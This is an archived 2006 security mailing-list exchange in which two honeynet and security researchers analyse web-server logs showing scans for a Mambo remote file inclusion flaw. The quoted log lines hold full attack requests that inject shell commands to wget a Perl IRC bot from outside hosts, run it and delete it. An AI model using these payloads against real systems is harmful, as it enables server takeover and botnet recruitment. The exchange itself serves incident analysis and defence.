Looks like some sort of shellbot wanting to connect to an IRC channel #abusers on abuser.hacked.in:8080.
I've been seeing occaisonal probes for Mambo's index.php on and off for a while now - the first part is similar to http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the payloads are slightly different, though it always seems to end up with an IRC bot of some kind. I usually see them coupled with scans for coppermine and other remote include issues, plus xmlrpc probes. I think you're seeing an attempt to exploit issue#3 here - http://secunia.com/advisories/18935/ cheers, Jamie On 14/05/06, Daniel Cid <[EMAIL PROTECTED]> wrote:
Since Thursday night I'm seeing a high volume of scans on different web servers for possibly the following vulns: http://secunia.com/advisories/14337/ http://www.osvdb.org/displayvuln.php?osvdb_id=10180 However, they say the problem is on function.php and I'm seeing them on index.php. Can anyone confirm that? Some log samples: 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0" 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
-- Jamie Riden / [EMAIL PROTECTED] / [EMAIL PROTECTED] NZ Honeynet project - http://www.nz-honeynet.org/
